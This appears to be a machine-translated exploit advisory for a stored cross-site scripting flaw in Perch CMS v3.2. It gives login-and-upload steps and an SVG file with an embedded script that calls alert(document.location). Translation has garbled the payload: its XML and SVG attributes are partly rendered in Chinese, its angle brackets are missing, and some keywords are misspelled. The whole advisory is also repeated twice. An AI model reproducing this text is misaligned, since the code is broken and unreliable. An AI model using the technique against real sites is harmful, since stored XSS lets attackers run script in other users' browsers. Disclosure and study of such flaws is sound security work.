利用标题: Perch v3.2-存储的XSS
Application: Perch CMS
版本: v3.2
BUGS: XSS
Technology: php
供应商URL: https://grabaperch.com/
软件link: https://grabaperch.com/download
发现日期: 21.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。转到http://localhost/perch_v3.2/perch/core/settings/
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到SVG文件(http://localhost/perch_v3.2/perch/resources/malas.svg)
Application: Perch CMS
版本: v3.2
BUGS: XSS
Technology: php
供应商URL: https://grabaperch.com/
软件link: https://grabaperch.com/download
发现日期: 21.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。转到http://localhost/perch_v3.2/perch/core/settings/
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到SVG文件(http://localhost/perch_v3.2/perch/resources/malas.svg)